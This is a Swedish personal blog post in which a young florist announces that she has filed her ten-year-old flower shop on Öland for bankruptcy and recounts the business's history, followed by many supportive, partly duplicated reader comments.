Hej från Tingsrätten…..

imageHej Fina du! Veckor av ångest och travande i mörker, med både beslut och tvivel. Famlandet efter ett halmstrå att greppa…

Oj vad tungt detta är. jag har börjat skriva på detta inlägget flera gånger. Raderat texten, stängt ihop datorn brutit ihop och gråtit!

image

Jag vet inte vad det är som skrämmer mig…. Din reaktion? Eller att det plötsligt blir så definitivt. Jag har in i det sista vänt ut och in på mig själv för att undvika det som nu idag blivit verklighet.

 Nåväl, jag gör ett försök, igen. Jag ska nu försöka gör en LÅNG historia kort. 

Jag startade My’s Blommor för snart 10 år sedan. Tio, långa intensiva härliga år med BLOD, SVETT, och TÅRAR. Guuuud vad mycket som har hänt under dessa år! Mer om det i ett senare inlägg när jag orkar berätta, både roliga och mindre roliga historier ifrån My’s Blommors historia. 

Jag startade min verksamhet på en liten grusplan utanför Lothar’s i Färjestaden. Precis intill Ölands Köpstad. Ingen utbildning, inget kapital, men en massa vilja och skinn på näsan efter erfarenheten jag fått genom att jobba med pappa som ambulerande blomsterhandlare på torg och marknader genom min uppväxt.  Jag växte, fort. Började varje morgon att dra ut alla blomstervagnar varje från ca 04/05:00 Och jobbade till sen kväll. Jag förverkligade min dröm <3

Framgången kom snabbt. Jag tjänade min första miljon redan första året. För mig som kom från ”ingenstans”, då utan utbildning och som hade stått på egna ben sedan 14 års ålder, då var det en extrem lättnad och lycka! Jag tog aldrig någon eller något för givet. Jag gick från noll anställda till flera. Jag gick från likt en ”torghandlare” till en butik.

Jag tog alla mina pengar och investerade i en fastighet. Den kallades ”Gula boden” och är den fastighet där My’s Blommor ligger idag. INGEN trodde på mig, alla var emot iden. Förutom Ludvigs pappa som jag redan då levde med. Jag körde på ändå. Då 19 år gammal.  Där fortsatte jag att växa. Både omsättningsmässigt, erfarenhetsmässigt, fler anställda, bredare sortiment. och med ytan.

Framgången var en succé, Jag blev prisad som ”årets unga företagare” ”årets entreprenör” på den lokala marknaden. Nu förra året ”årets florist”.  Jag pendlade VARJE vecka ner till Holland för att grå inköp till min egna butik. Jag stack ut i mängden, hade ett annorlunda sortiment till BRA pris.

Jag dominerade inte bara kommunen utan hela länet. Folk åkte inifrån Småland för att handla hos mig. Mycket tack vare uppmärksamhets genom lokaltidningar, utmärkelserna och vissa radio intervjuer. MEN Marknaden såg annorlunda ut. Hansa City inne i Kalmar, med IKEA, City gross, plantagen, Bauhaus och alla andra fanns ännu inte. Ö&B hade ännu inte börjat sälja blommor, Netto hade inte öppnat. osv.

Jag var inte ensam på marknaden, men jag var ensam om att ha den mängd, det sortiment och det breda utbudet. Jag växte ur min egna butik och investerade allt jag hade i att bygga ut en tillbyggnad till.

Samtidigt investerade jag i ytterligare en butik inne i Kalmar. En söt charmig, liten butik som min sons pappas familj startat upp 40 år tidigare. Jag drev alltså två butiker och hade ”utbygget” på gång! Jag köpte till mark och började bygga. Full fart framåt! Stora visioner och drömmar…. 

Detta var en stor och omfattande satsning. När ”utbygget” stod klart inför invigning så rasade min värld.

Detta var tidig vår 2011. Ludvig var 8-10 veckor när det kom fram att hans pappa varit otrogen och efter några veckor senare att han även gjort en annan kvinna gravid (detta är en avslutat kapitel, och redan omskrivet sedan tidigare)

MEN självklart rasade hela min värld. Jag var knäckt! Som nybliven mamma, med då 12 anställda, två butiker, en helt byggteam och en j*dra massa beslut att ta… Så var inte livet som nybliven 23-åring och mamma någon dans på rosor. Utan boende i jakt på en ”trygghet” började jag famla runt i mörker. Tillfälliga boenden innan jag köpte mitt första EGNA hus, mitt ute i ödemarken i Tveta. Ett nybyggt hus, litet, charmigt med stor tomt.

Detta blir perfekt tänkte jag. En kvart till jobbet, en tomt där Ludvig kunde få lära sig gå och där vovven Tezz kunde springa fritt. Här skulle jag landa och starta om. Trodde jag. Där började trakasserierna, vandalisering, sönderskurna däck M.m som resulterade i Polisövervakning, överfallslarm osv. Det är också en historia för sig som jag verkligen inte orkar gå in på just nu.

Jag lämnade huset i ren panik efter ett år, jag gav upp. Jag flyttade med Ludvig och vovven till en bostadsrätt med grannar runtomkring mig. Nu skulle jag börja om IGEN.

Men effekten av min separation och följden med problematiken i mitt hus ute på landet var att jag inte fungerade som jag skulle på jobbet. Jag var inte den Chef och arbetsgivare jag hade behövt vara. Det är ingen annans fel än mitt eget. Jag släppte över mer ansvar på mina tjejer. Vissa skötte  sig EXEMPLARISKT! Andra tog tillfället i akt. Då började internstöld. Vi förlorade MYCKET pengar under en lång period innan vi tillslut fick stopp på den problematiken. SUCK!

Samtidigt så började jag ”landa” i livet som ensamstående mamma och började ”komma tillbaka” till mitt gamla jag.

Men här började företaget att blöda, extremt mycket. Påföljden av mitt privata kaos, utbygget osv gjorde att vi började visa röda siffror. Vad händer sen?

Jo, jag är med om en trafik olycka. Ludvig var som tur var inte med bilen. Jag blev liggande på sjukhus, Ludvig var strax över året och fick då vara med sin pappa. Jag hade aldrig varit utan Ludvig då. Mer än några timmar, en kväll eller så. Jag låg på sjukhuset, nackkrage och utan känsel i benen. Ännu en gång HELT KNÄCKT! 

-När ska min otur vända? Vad hade jag gjort för att förtjäna detta?

Jag tog ett beslut ifrån sjukhus sängen. Stäng Kalmar butiken. På en gång! Jag hade kunnat sätta butiken i konkurs och gått helt ”fri” utan privata skulder. MEN mitt samvete tillät inte det. Jag flyttade över allt till Ölands butiken, även viss personal, och gav bort hyreskontraktet. Inte så affärsmässigt. Men så gick det till. Jag fick med en x-antal hundra tusen i skuld och betalade in allt till alla mina leverantörer och valde att ta smällen själv.  Det är och var viktigt för mig att göra rätt för mig. Jag menar jag har ju samma leverantörer som jag hade i Ölands butiken.

Så fram tills ganska nyligen har jag legat och betalat av på denna skuld. Vissa tycker att jag var ”dum i huvudet” som gjorde så, jag känner mig tillfreds och stolt över mitt beslut. Jag hade hemhjälp en period efter olyckan och med sjukgymnastik kom jag oväntat snabbt tillbaka på banan igen. Vilken pärs! Men då j*klar kom jag tillbaka.

Jag fick rensa bland personal, och börja om att bygga upp ett ”dream team” som varken stal eller saboterade på jobbet. 

Jag började jobba som grossist i Holland hos mina leverantörer och hade snart arbetat upp ett helt kundregister runt om i Sverige. Detta kombinerade jag med My’s Blommor. Med hjälp av denna inkomsten så kunde jag beta av på skulden ifrån Kalmar butiken.

Ludvig var med mig i bärselen. Varje dag, överallt. Till Holland, i butik och hemma. Jag var tillbaka ”starkare än någonsin” Visade fortfarande röda siffror, men hade tagit kontroll över situationen. 307974_248057288566106_4912106_n

Sen kom vi till sommaren 2013. Då ringde dom ifrån ”Ensam Mamma Söker”. Jag satt i Holland när jag fick det samtalet. Jag trodde att det var ett skämt. Men det var det inte. Jag hade inte sett programmet tidigare. Men såg min chans att få en sommar ”ledigt” med Lilleman och ett steg att våga mig tillbaka ut i det riktiga livet. Jag tackade  ja till detta oförglömliga äventyr. Inspelningen påbörjades. Bloggen följde i kontraktet och ett helt nytt liv började för mig. Det tar vi också i ett annat inlägg….  1015542_562839137087918_121764864_oSå vart vill jag komma med min korta historia av den långa verkligheten? Jo, såhär ligger det till My’s Blommor blödde alltså rent ekonomiskt INNAN Ensam Mamma Söker. Jag har genom Ensam Mamma blivit med blogg. Välkommen hit. Jag som har både dyslexi och som absolut inte hade någon erfarenhet av sociala medier tycker ändå att det varit sjukt roligt att utvecklas och göra en resa även inom detta.

Jag flyttade förra året upp till Stockholm. Eller rättare sagt norr om Sthlm, Sigtuna. Varför gjorde jag det?

Jo, självklart för att jag TRIVS bättre där uppe. Lite pga av mycket negativt jag varit med här nere. MEN huvudanledningen var att jag med hjälp av bloggen, alla andra sidojobb och projekt där jag då utgår ifrån Sthlm har försörjt My’s Blommor sista åren. Jag har alltså haft TRE jobb för att hålla My’s Blommor levande.

Jag har stoppat in ”alla” pengar i butiken för att få den att överleva. Inför löner, inför skatter och moms osv. Självklart har jag även sett över butikens utgifter, minimerat allt jag kunnat. Hyrt ut en del av lokalen till ett annat företag. Minskat personal timmarna, minskat lager, sett över kostnader och effektiviserat upp allt som gått osv osv.

-Jag har banne mig gjort ALLT JAG HAR KUNNAT, och lite till!

Usch nu gråter jag gen….. Detta gör så fruktansvärt ont. Det faktum är att jag har ställts inför diverse olika beslut och förhandlingar senaste veckorna. Det har blivit dags för mig att sluta tänka med hjärtat och istället med hjärnan. Hur hemskt det än låter så är det precis så det är. Jag stod inför ett vägskäl, och har tvingats ta ett beslut.

Jag har nu tagit sats och kört ”rakt in i kaklet”. Med hjälp av utförsäljning osv så har jag idag betalat av ALLA leverantörs skulder. Det finns ingen moms eller skatt som släpar. Allting har skötts helt regelrätt. Jag ”blåser” alltså inte någon. jag är inte skyldig någon pengar…. jag lyckades komma ifatt med allt. 

image

Jag har precis just nu, lämnat Tingsrätten. Med min revisor. Jag har begärt mig själv i konkurs. JAG har alltså valt att sätta butiken i konkurs, ingen annan. My’s Blommor finns alltså från och med idag inte kvar. En resa på snart tio år av blod, svett och tårar tar nu slut.

Mitt livsverk, min dröm, min identitet har fått sig en kraftig törn! -Vem är jag utan My’s blommor?

Min älskade butik ska nu avslutas. Jag gav inte upp, jag kämpade in i det sista, men det räckte inte. Jag gav allt, men nådde inte ända fram……….

imageimageJag kan se tillbaka på dessa år med ett gott samvete. Jag ler när jag tänker tillbaka på allt jag har fått vara med om. Att skissa och rita ett utbygge. Att förvandla åker och mark till ett Blommande Garden Center. Att utveckla både butiken och framförallt mig själv….

Jag VET vad jag hade  kunnat göra annorlunda, med facit i hand har jag fått lära mig en dyr läxa genom dom misstag jag gjort. Jag är väl medveten om det och står för det. Både inför dig, men framförallt inför mig själv.

Jag får försöka att förlika mig med dom saker som jag inte har kunnat påverka och blivit utsatt för. Jag får ta med mig allting som en erfarenhet. 

Jag kan med rent samvete säga att jag försökte, och gav allt! Både känslomässigt och fysiskt. Jag säger inte det för din skull…. Utan för stt det är viktigt för MIG och min egen självkänsla…. 

Tyvärr räckte det inte….. OLYMPUS DIGITAL CAMERAJag kan leva med att jag förlorar dom miljonerna jag investerat genom åren…Men att lämna mitt livsverk, som jag byggt upp under tio års tid och att göra mina anställda, mitt ”dream team”, arbetslösa. Det är en TUNG SORG, som gör obeskrivligt ont! 

Jag vet inte riktigt vad jag ska göra nu. Men jag ska försöka att landa i detta, bearbeta, sörja….

Här ser ni min högra och vänstra hand Evelina & Vickan! Outstandning! Vilka hjältar, vilka fantastiska och underbara människor, vilka vänner! -Tack för att ni är NI! Tack för att ni funnits och finns vid min sida <3

Jag ska nu sätta mig ner med dessa tjejer, prata, gråta, skratta… 

Några andra medarbetare som också betytt mycket som jag vill omnämna med kärlek och respekt är: Malin S, Sara, Ulrica, Uvonne, Nettan, Emelie, Ida, Annika, Emma ”Maja”, Viktoria <3

Ett stort tack för denna tiden säger jag till mina leverantörer, samarbetspartner och framförallt till alla våra trogna kunder! Jag kommer att sakna er! <312391996_1005460239500727_7101751360778286047_n
Det är mörkt nu, Men jag kommer att komma tillbaka!

/ My Martens 

271 Komentarer

 1. <3 <3 Kramar, hoppas det kan lösa sig till det bästa endå trotts konkursen, du är en stark tjej som kommer hitta andra möjligheter ♥ stor kram ♥

 2. Öppet modig inlägg! Du ska Se, när en dörr stängs öppnas en annan! Förstår att detta är tufft, men snart kommer det nog kännas bra. Du kan nu satsa helt på ditt liv i Sigtuna, på träning och hälsa kanske?! Om du saknar butiken och blommorna om några år finns det inget som säger att du inte kan göra något liknande igen!
  Tänk vad mycke tid du kommer få till annat nu.
  Modiga My! Stort lycka till!!

 3. Mitt i allt så har du i alla fall kommit ut ur stormens öga nu. Wow som du har kämpat!! Nu hoppas jag att du landar mjukt efter all stress och press och att du får pusta ut. Jag är övertygad om att driftiga du kommer tillbaka stark och med en inre tro på dig själv för du kan – jisses vad du kan! Kram <3

 4. Å så starkt gjort!! Du ska se ur allt detta kommer något bra. … Du är så stark och man får bryta ihop de är okej. Tänu vad du lärt dig mycket under alla dessa år. Kämpa på du har erfarenhet som många andra inte har med sig i bagaget . Hoppas du kunde kan njuta o se ljuset o lyckan.
  Styrke KRAMAR till dig My, lilleman och Tess

 5. Såå tråkigt att höra…..jag som alltid köper mina Ölands blommor hos dig!!
  Men du har kämpat på bra!! Önskar dig all lycka i världen.Efter regn kommer solsken!
  Ta hand om dig och Lilleman och ha en skön och fin sommar trots allt.

 6. Vilken stark historia, jag känner verkligen starkt med dig. En liten undran som jag som revisor har är varför du väljer konkurs när du säger att du är i kapp med allt och att du inte är skyldig någon pengar? Jag trodde att man var tvungen att vara skyldig någon pengar för att ens få ansöka om konkurs? Stort lycka till med allt!

  • Men om egna kapitalet är förbrukat och man inte vill lägga in mer.. Lånet företaget ev har kanske är till aktieägaren, behöver ju inte vara någon utomstående.

 7. Du är inte dina prestationer. Fast jag kan förstå sorgen och att man är sitt företag. Fortsätt kämpa, snart kommer medvind!!!

 8. Starka fina My, jag finner inga ord, men efter regn kommer solsken, kanske inte direkt, men inom en överskådlig framtid.
  All lycka till i framtiden <3
  Kramar

 9. Jag som jobbar med ekonomi undrar dock varför du begärt firman i konkurs? Om det inte som du skriver finns några skulder, är det inte bättre att avveckla el sälja företaget?
  Lycka till i framtiden!

 10. Fy vilket jobb du har lagt ner för att göra rätt för dej. Men jag beundrar din styrka att orka göra rätt.
  Nu önskar jag dej all lycka tillsammans med Ludvig och Tess. Och ta det nu lugnt så länge det går och njut av livet tillsammans med dina nära och kära.

 11. Sitter och läser din text med tårarna rinnande. Detta gick min familj igenom när yngsta sonen var bebis. Resan att komma till beslutet är tung, även efter…men kommer igenom! Önskar dig allt gott, är övertygad om att det kommer att gå bra för dig! Stor kram

 12. Lilla My, du har gjort allt du kan och mer kan man inte göra. Stor kram till er alla på My’s Blommor. Förstår hur tomt och jobbigt allt är nu (jag har själv varit där) men allt har en lösning, nu kan allt bara bli bättre. Tänker på dej, kram kram!

 13. Kraaaaaam!
  Var stolt över dig själv! Du har verkligen inte gett upp i första taget utan verkligen kämpat.
  Släpp nu det här o gå vidare. <3

 14. Tillåt dig att sörja en kort period och gå sedan stärkt ur det och håll huvudet högt! Klarar du detta klarar du ALLT! Kramar

 15. Stor respekt till dig My ❤️ Vilken stark tjej du är som går ut med detta. Du är grym det ska du veta och det kommer bli bra i slutändan även om du kommer gå igenom en tuff tid nu . Stor styrkekram till dig världens bästa My ❤️

 16. Jag har också gjort en konkurs. Alltid tufft när man lagt ner så mycket pengar och energi i företaget. Jag såg skulderna som följde som mina studielån. Att jag hade drivit eget företag gjorde att jag kunde söka andra jobb trots att jag inte hade rätt akademisk utbildning. Önskar dig lycka till och när du väl orkar så kommer du finna glädje i dina andra jobb och projekt. Kram till dig och Ludvig

 17. Du har gjort allt du kunnat! Du är stark! Vilken resa du gjort! All respekt till dig My! Vila ut, krama om din Lilleman och du ska se att en ny dörr öppnas. Kram

 18. Oj det var mycket på en gång..beklagar. Har hela tiden förstått det gällde företaget men trodde nog du ville sälja eller avsluta pga att du hittat andra sätt att tjäna pengar och vill vara i Sthlm och på resor… trodde företaget gick bra med tanke på alla inköp och du var väl nyligen på inköpsresa och var väl inte så längesen du skrev om ut/tillbyggnad eller nåt ni skulle utöka med? jag kan ha fel… oavsett om det var av fri vilja eller om det var ett måste så är det förstås sorgligt när en era går i graven…Men du verkar vara en väldigt smart affärskvinna, vet hur man gör motgångar till framgångar…såklart sorgligt och svårt då det drabbar flera och som sagt när något går i graven, trist det blev så tycker jag.. Men lycka till nu med flytt, bostad, jobb och allt…hoppas du får en fortsatt bra sommar <3

 19. <3 <3 Kramar, hoppas det kan lösa sig till det bästa endå trotts konkursen, du är en stark tjej som kommer hitta andra möjligheter ♥ stor kram ♥

 20. Öppet modig inlägg! Du ska Se, när en dörr stängs öppnas en annan! Förstår att detta är tufft, men snart kommer det nog kännas bra. Du kan nu satsa helt på ditt liv i Sigtuna, på träning och hälsa kanske?! Om du saknar butiken och blommorna om några år finns det inget som säger att du inte kan göra något liknande igen!
  Tänk vad mycke tid du kommer få till annat nu.
  Modiga My! Stort lycka till!!

 21. Mitt i allt så har du i alla fall kommit ut ur stormens öga nu. Wow som du har kämpat!! Nu hoppas jag att du landar mjukt efter all stress och press och att du får pusta ut. Jag är övertygad om att driftiga du kommer tillbaka stark och med en inre tro på dig själv för du kan – jisses vad du kan! Kram <3

 22. Vilken stark tjej du är ! Du har verkligen gjort allt som du kunnat
  Sträck på dig och var den fantastiska kvinna du är !!
  Krama sonen gråt i hunden
  Du kommer igen !!
  Sådana som du växer inte på träd
  Kram Evakarin

 23. Tungt och jobbigt för dej förstår jag. Men hoppas att detta gjort att du kunnat sätta punkt och nu sakta sakta får gå vidare. Kram

 24. Å så starkt gjort!! Du ska se ur allt detta kommer något bra. … Du är så stark och man får bryta ihop de är okej. Tänu vad du lärt dig mycket under alla dessa år. Kämpa på du har erfarenhet som många andra inte har med sig i bagaget . Hoppas du kunde kan njuta o se ljuset o lyckan.
  Styrke KRAMAR till dig My, lilleman och Tess

 25. Såå tråkigt att höra…..jag som alltid köper mina Ölands blommor hos dig!!
  Men du har kämpat på bra!! Önskar dig all lycka i världen.Efter regn kommer solsken!
  Ta hand om dig och Lilleman och ha en skön och fin sommar trots allt.

 26. Vilken stark historia, jag känner verkligen starkt med dig. En liten undran som jag som revisor har är varför du väljer konkurs när du säger att du är i kapp med allt och att du inte är skyldig någon pengar? Jag trodde att man var tvungen att vara skyldig någon pengar för att ens få ansöka om konkurs? Stort lycka till med allt!

  • Men om egna kapitalet är förbrukat och man inte vill lägga in mer.. Lånet företaget ev har kanske är till aktieägaren, behöver ju inte vara någon utomstående.

 27. Du är inte dina prestationer. Fast jag kan förstå sorgen och att man är sitt företag. Fortsätt kämpa, snart kommer medvind!!!

 28. Starka fina My, jag finner inga ord, men efter regn kommer solsken, kanske inte direkt, men inom en överskådlig framtid.
  All lycka till i framtiden <3

  Kramar

 29. Jag som jobbar med ekonomi undrar dock varför du begärt firman i konkurs? Om det inte som du skriver finns några skulder, är det inte bättre att avveckla el sälja företaget?
  Lycka till i framtiden!

 30. Fy vilket jobb du har lagt ner för att göra rätt för dej. Men jag beundrar din styrka att orka göra rätt.
  Nu önskar jag dej all lycka tillsammans med Ludvig och Tess. Och ta det nu lugnt så länge det går och njut av livet tillsammans med dina nära och kära.

 31. Fina My, ta all tid du behöver. var med Lilleman och vovven och återhämta dig där du känner dig trygg! Du är en fantastisk driven ung kvinna med ett sådant gott hjärta och rent samvete… Jag som utlandssvensk saknar en sight (hemsida på nätet) där jag kan skicka blommor till nära och kära i Sverige. Alltså där blomman eller plantan levereras av blomsterbud.. Kanske en ny affärsidé för dig, du är ju jätteduktig på nätet (också!) Väldigt varm kram från Barcelona!

 32. Sitter och läser din text med tårarna rinnande. Detta gick min familj igenom när yngsta sonen var bebis. Resan att komma till beslutet är tung, även efter…men kommer igenom! Önskar dig allt gott, är övertygad om att det kommer att gå bra för dig! Stor kram

 33. Lilla My, du har gjort allt du kan och mer kan man inte göra. Stor kram till er alla på My’s Blommor. Förstår hur tomt och jobbigt allt är nu (jag har själv varit där) men allt har en lösning, nu kan allt bara bli bättre. Tänker på dej, kram kram!

 34. Kraaaaaam!
  Var stolt över dig själv! Du har verkligen inte gett upp i första taget utan verkligen kämpat.
  Släpp nu det här o gå vidare. <3

  • Skulle hon lägga ner så måste hon ändå tex betala lön till dom anställda då dom har uppsägningstid.
   Går hon i konkurs så går statliga lönegarantin in och betalar lönen till anställda.
   Hon SJÄLV går inte i personlig konkurs då det är aktiebolag MEN långivare som banker och vissa leverantörer KAN begära hon själv går i borgen för skulderna ändå. Därav hon förmodligen försökt betala så mycket som möjligt om så sker att dom vill hon ska göra så.
   Begär dom inte det så upphör skulderna när konkursen är över oftast.
   Hade hon haft enskild firma hade hon drabbats hårt, väldigt hårt i många år framöver.

 35. Tillåt dig att sörja en kort period och gå sedan stärkt ur det och håll huvudet högt! Klarar du detta klarar du ALLT! Kramar

 36. Vilket starkt inlägg o jösses vilken drivkraft o mod du har ! Det vänder nu ska du se. Du har ju verkligen gjort allt du kan o lite till. Kram

 37. Stor respekt till dig My ❤️ Vilken stark tjej du är som går ut med detta. Du är grym det ska du veta och det kommer bli bra i slutändan även om du kommer gå igenom en tuff tid nu . Stor styrkekram till dig världens bästa My ❤️

 38. Jag har också gjort en konkurs. Alltid tufft när man lagt ner så mycket pengar och energi i företaget. Jag såg skulderna som följde som mina studielån. Att jag hade drivit eget företag gjorde att jag kunde söka andra jobb trots att jag inte hade rätt akademisk utbildning. Önskar dig lycka till och när du väl orkar så kommer du finna glädje i dina andra jobb och projekt. Kram till dig och Ludvig

 39. Till alla er som undrar varför My begärde firman i konkurs, trots att hon betalt skulderna!
  Man är enligt lag tvungen att själv begära sin firma i KK, om den går med förlust, så My har gjort alldeles rätt, har själv varit i samma situation.
  Till My! Du kommer att fixa detta oxå! Skickar en stor Bamsekram till dig! Å My, gå rakryggad, Du har inget att skämmas över. Ta hand om dig o Lilleman .

 40. Starkt av dej våga berätta.usch stackare sänder styrkekramar allt kommer lösa sej.du förtjänar ljus och kärlek.stor kram på dej från holland.kram mia e

 41. Du har gjort allt du kunnat! Du är stark! Vilken resa du gjort! All respekt till dig My! Vila ut, krama om din Lilleman och du ska se att en ny dörr öppnas. Kram

 42. Oj det var mycket på en gång..beklagar. Har hela tiden förstått det gällde företaget men trodde nog du ville sälja eller avsluta pga att du hittat andra sätt att tjäna pengar och vill vara i Sthlm och på resor… trodde företaget gick bra med tanke på alla inköp och du var väl nyligen på inköpsresa och var väl inte så längesen du skrev om ut/tillbyggnad eller nåt ni skulle utöka med? jag kan ha fel… oavsett om det var av fri vilja eller om det var ett måste så är det förstås sorgligt när en era går i graven…Men du verkar vara en väldigt smart affärskvinna, vet hur man gör motgångar till framgångar…såklart sorgligt och svårt då det drabbar flera och som sagt när något går i graven, trist det blev så tycker jag.. Men lycka till nu med flytt, bostad, jobb och allt…hoppas du får en fortsatt bra sommar <3

 43. Ååå vad tråkigt för dig med din fina fina butik. Lider verkligen med dig.
  Jag är själv just i samma situation då det största beslutet måste tas. Tyvärr har jag nog ingen annan utväg än densamma som du ?
  Det känns så himla sorgligt bara.
  Jag hoppas att det nu blir bra fort igen, och följer din väg framåt.
  Stor kram till dig.

 44. Om någon har kraft att ta sig ur och igenom en sån har situation så är det du. Du är så driven och stark, snart kommer allt att falla på plats och nya möjligheter uppenbara sig. Jag tror också att alla vet att du gjort allt du kunnat för att göra rätt för dig… du kan gå ur det här med huvudet högt. Ta hand om dig. Kram

 45. Vilken stark tjej du är ! Du har verkligen gjort allt som du kunnat
  Sträck på dig och var den fantastiska kvinna du är !!
  Krama sonen gråt i hunden
  Du kommer igen !!
  Sådana som du växer inte på träd
  Kram Evakarin

 46. Tungt och jobbigt för dej förstår jag. Men hoppas att detta gjort att du kunnat sätta punkt och nu sakta sakta får gå vidare. Kram

 47. My! Jag känner inte dig och läser din blogg mellan varven. Dock handlar jag i din butik nästan varje vecka. Jag måste säga att du har gjort helt rätt. Inga tvivel om saken. Så ung som du är har du varit med om mycket obehagligheter. Landa lite. Kom sen igen. Med något som du brinner för och som du vill. Jag har precis avvecklat en verksamhet med 25 anställda. Det är ju vidrigt. Men människor är vana vid att konstiga saker händer i deras liv. Kämpa My! Kämpa! För att bli hel igen och ta nya tag. Kram på dig!

 48. Fina My. Så stark du är som delar med dig av allt som händer. Jag önskar dig all lycka framåt och att du kan landa o börja må bättre, att du slipper din ångest. Stor kram o varmt lycka till

 49. Styrkekramar till dig My! Men..det viktigaste av allt.. Du är frisk och lilleman är frisk! Det enda som betyder något. Lätt att säga jag vet, men det kunde varit värre My! Du kommer gå stärkt ur det här!

 50. Fina My, ta all tid du behöver. var med Lilleman och vovven och återhämta dig där du känner dig trygg! Du är en fantastisk driven ung kvinna med ett sådant gott hjärta och rent samvete… Jag som utlandssvensk saknar en sight (hemsida på nätet) där jag kan skicka blommor till nära och kära i Sverige. Alltså där blomman eller plantan levereras av blomsterbud.. Kanske en ny affärsidé för dig, du är ju jätteduktig på nätet (också!) Väldigt varm kram från Barcelona!

 51. Så tråkigt med din fina butik, min favorit att handla blommor och annat fint där och alltid fantastisk service! Jag lider verkligen ned dig My och skickar all beundran för din styrka o mod och massa kramar till dig!!

 52. Ditt beslut är helt rätt, med tiden blir det bara klarare och klarare för dig.
  Som du har kämpat!
  Det kommer att komma mycket gott ur detta.
  All heder åt dig, My!
  Kramar!!!

  • Skulle hon lägga ner så måste hon ändå tex betala lön till dom anställda då dom har uppsägningstid.
   Går hon i konkurs så går statliga lönegarantin in och betalar lönen till anställda.
   Hon SJÄLV går inte i personlig konkurs då det är aktiebolag MEN långivare som banker och vissa leverantörer KAN begära hon själv går i borgen för skulderna ändå. Därav hon förmodligen försökt betala så mycket som möjligt om så sker att dom vill hon ska göra så.
   Begär dom inte det så upphör skulderna när konkursen är över oftast.
   Hade hon haft enskild firma hade hon drabbats hårt, väldigt hårt i många år framöver.

 53. Stark historia som griper tag i en! Vad du har byggt upp, drivit och kämpat i så ung ålder. Det kommer gå bra för dig då du har nåt väldigt unikt! Tråkigt att höra om ditt företag, men när en dörr stängs öppnas en annan. Tänk vilken erfarenhet du har! Lycka till! Kommer fortsätta läsa din blogg som jag gjort från börjsn, hoppas du fortsätter dela med dig, modiga du!! ?

 54. Vad modig du är! Du har verkligen kämpat och att ta det beslutet själv visar vilken kämpe du är! Nu får du bryta ihop och komma igen! Stort lycka till i fortsättningen och stor kram. ❤️

 55. Du gör helt rätt My! Det kommer bli lättare med tiden. Ta det lugnt och omge dig med människor som betyder nåt för dig. Lycka till i fortsättningen:)

 56. Hej My!
  De var tråkigt att höra, jag som hade tänkt åka till dig i affären och handlat lite, men hälsan gå före hoppas du mår bättre snart!
  Många kramar till dig!
  MVH//Johanna

 57. Vilket starkt inlägg o jösses vilken drivkraft o mod du har ! Det vänder nu ska du se. Du har ju verkligen gjort allt du kan o lite till. Kram

 58. Ett klokt beslut. För mig ett väntat beslut. Det kommer bli bra vad det lider. Det är tufft nu. Jag förstår det. Men allt kommer hamna på plats och du kommer att landa.
  Lycka till ❤

 59. Hej My!
  Vad jag inte förstår är att om du betalt alla skulder varför säljer du inte företaget istället?? Då kanske du kan få ut lite pengar, eller är det kanske för att lönegarantin ska gå ut till dina anställda men kanske dags att tänka på dig själv, dom klarar sig ändå:) Hoppas du inte tror att detta är näthat som du har trott varje gång jag kommenterat. Tycker faktiskt du är en stark och härlig person och önskar dig all Lycka Till i framtiden. Styrkekram

 60. Till alla er som undrar varför My begärde firman i konkurs, trots att hon betalt skulderna!

  Man är enligt lag tvungen att själv begära sin firma i KK, om den går med förlust, så My har gjort alldeles rätt, har själv varit i samma situation.

  Till My! Du kommer att fixa detta oxå! Skickar en stor Bamsekram till dig! Å My, gå rakryggad, Du har inget att skämmas över. Ta hand om dig o Lilleman .

 61. Starkt av dej våga berätta.usch stackare sänder styrkekramar allt kommer lösa sej.du förtjänar ljus och kärlek.stor kram på dej från holland.kram mia e

 62. Du är så modig och har tagit ett riktigt beslut. Som du har försökt under alla dessa år, mer kan man inte göra. Du har inget att varken skämmas för eller ångra, du har en erfarenhet som du kommer att bära med dig. När du mår bättre och landar i allt så kommer du att hitta nya vägar med dina erfarenheter. Jag är övertygad om att du kommer att nå nya höjder igen duktiga fantastiska kvinna som du är. Ta hand om dig och fortsätt gå i terapi, det hjälper…. Kram

 63. Hej My! Vissa saker behöver man själv uppleva för att riktigt förstå, denna situation du befinner dig i är en sådan! Det krävs styrka och mod för att orka allt det som du går igenom nu! Du är så stark och modig och du kommer lyckas bra framöver när nya dörrar öppnas! Blicka nu framåt och ta hand om dig. Önskar dig lycka till med allt! Stor kram till dig fina My

 64. Du är en stark kvinna med en enorm drivkraft. Allt kommer ordna sig med tiden ska du se, du kommer igen starkare än nånsin. Stor styrkekram

 65. Ååå vad tråkigt för dig med din fina fina butik. Lider verkligen med dig.
  Jag är själv just i samma situation då det största beslutet måste tas. Tyvärr har jag nog ingen annan utväg än densamma som du 🙁
  Det känns så himla sorgligt bara.
  Jag hoppas att det nu blir bra fort igen, och följer din väg framåt.
  Stor kram till dig.

 66. Åh så ledsamt att läsa. Du har alltid sett som mest glad och tillfreds ut på bilderna som tagits i butiken, och om den känslan går igenom bilderna så kan jag nog inte ens till liten del förstå hur jobbigt detta är för dig. Men oj vad rakryggad du ska gå ur detta My, som du kämpat!! Helt otroligt att du orkat, men som du skriver så är du en stark person som kommer ta dig igenom även detta. Ta hand om dig, sörj när det behövs, skratta när det behövs och ta en dag i taget! Styrke kramar i massor från en som gillar dig blogg till tusen för att du alltid känns genuin och ärlig

 67. Om någon har kraft att ta sig ur och igenom en sån har situation så är det du. Du är så driven och stark, snart kommer allt att falla på plats och nya möjligheter uppenbara sig. Jag tror också att alla vet att du gjort allt du kunnat för att göra rätt för dig… du kan gå ur det här med huvudet högt. Ta hand om dig. Kram

 68. Klart du kommer tillbaka! Du är en entreprenör och du har skaffat dig en stor kunskapsbank i att driva ett företag. Det är bara sunt att avsluta ett företag som gått med förlust i 3 år. Se till att vila upp dig, sen när du får perspektiv på vad som hänt ska du använda dina erfarenheter till ditt nästa steg i livet. Anklaga inte dig sjäv, det är inte brottsligt att gå i konkurs.

 69. Tårarna rinner när jag läser ditt inlägg. Känner med dig! Stor styrkekram❤️ Fortsätt kämpa och Lycka till. Gud välsigne dig❤️

 70. My! Jag känner inte dig och läser din blogg mellan varven. Dock handlar jag i din butik nästan varje vecka. Jag måste säga att du har gjort helt rätt. Inga tvivel om saken. Så ung som du är har du varit med om mycket obehagligheter. Landa lite. Kom sen igen. Med något som du brinner för och som du vill. Jag har precis avvecklat en verksamhet med 25 anställda. Det är ju vidrigt. Men människor är vana vid att konstiga saker händer i deras liv. Kämpa My! Kämpa! För att bli hel igen och ta nya tag. Kram på dig!

